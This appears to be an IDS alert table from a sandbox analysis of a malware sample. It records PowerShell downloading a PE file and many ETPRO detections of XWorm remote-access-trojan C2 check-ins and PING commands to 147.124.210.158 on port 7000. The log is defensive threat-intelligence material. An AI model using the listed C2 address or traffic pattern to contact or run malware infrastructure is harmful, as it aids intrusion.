                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-07T17:02:06.437911+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449735140.82.121.4443TCP
                                                                                                    2025-01-07T17:02:07.042650+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449736185.199.111.133443TCP
                                                                                                    2025-01-07T17:02:07.042714+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download2185.199.111.133443192.168.2.449736TCP
                                                                                                    2025-01-07T17:02:21.335845+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:02:21.470519+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:21.581245+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:02:22.731373+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:22.731373+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:31.531254+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:31.533074+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:02:41.584888+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:41.587228+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:02:51.649727+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:51.651849+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:02:52.744766+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:02:52.744766+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:01.709984+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:01.712273+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:11.773035+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:11.774517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:16.556698+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:16.558381+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:19.532695+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:19.535244+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:19.788271+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:19.789739+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:19.885303+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:19.886741+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:20.047518+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:20.049033+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:20.144450+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:20.151341+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:20.340504+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:20.342428+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:21.148835+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:21.150407+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:22.752150+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:22.752150+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:25.459917+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:25.462721+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:31.353393+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:31.355350+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:32.388043+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:32.544878+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:32.550467+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.649193+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:35.651334+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.734503+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:35.794255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:35.838968+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.894075+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:35.895581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.935798+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.982984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:35.992980+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:36.031181+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:39.882047+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:39.883789+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:43.631936+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:43.634045+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:46.287060+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:46.288726+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:46.384121+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:46.390441+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:52.753623+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:52.753623+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:52.970947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:52.970947+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:56.366084+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:56.367852+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:03:56.595362+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:03:56.597821+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:01.102834+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:01.117493+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:01.885521+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:01.902521+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.132649+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:02.134419+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.206572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:02.208820+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.304222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:02.305984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.450626+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:02.452245+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.547756+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:02.552404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.683004+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:02.687954+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:06.929899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:06.936662+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:12.522518+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:12.527347+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:12.622846+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:12.626076+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:16.759914+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:16.764418+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:17.882005+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:17.883972+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.006799+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.008561+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.129376+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.130844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.170813+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.172343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.229088+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.230847+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.267844+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.269196+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:18.326290+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:18.327661+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:22.760060+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:22.760060+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:22.970896+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:22.970896+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.598599+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.600347+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:23.687515+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.749450+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.751258+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:23.780429+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.843138+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.844885+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:23.865979+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.910954+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:23.922338+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:23.924018+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:24.006294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:24.008433+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:24.019448+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:24.021239+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:24.105852+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:24.110799+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:25.290955+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:25.292770+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:34.131786+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:34.134426+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:34.229904+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:34.235462+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:34.330870+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:34.332404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:34.584806+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:34.592445+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:44.366381+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:44.385296+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:44.482149+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:44.487184+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:48.294416+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:48.295850+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:51.087521+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:51.090494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:51.445097+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:51.447906+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:52.777903+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:52.777903+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:53.243054+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:53.247876+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:55.928746+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:55.930707+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:59.757336+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:59.759060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:59.811466+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:59.816394+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:59.856341+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:59.858119+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:04:59.989968+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:04:59.991792+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:00.061594+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:00.063084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:00.087186+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
                                                                                                    2025-01-07T17:05:00.092042+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449737147.124.210.1587000TCP
                                                                                                    2025-01-07T17:05:00.158539+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.124.210.1587000192.168.2.449737TCP
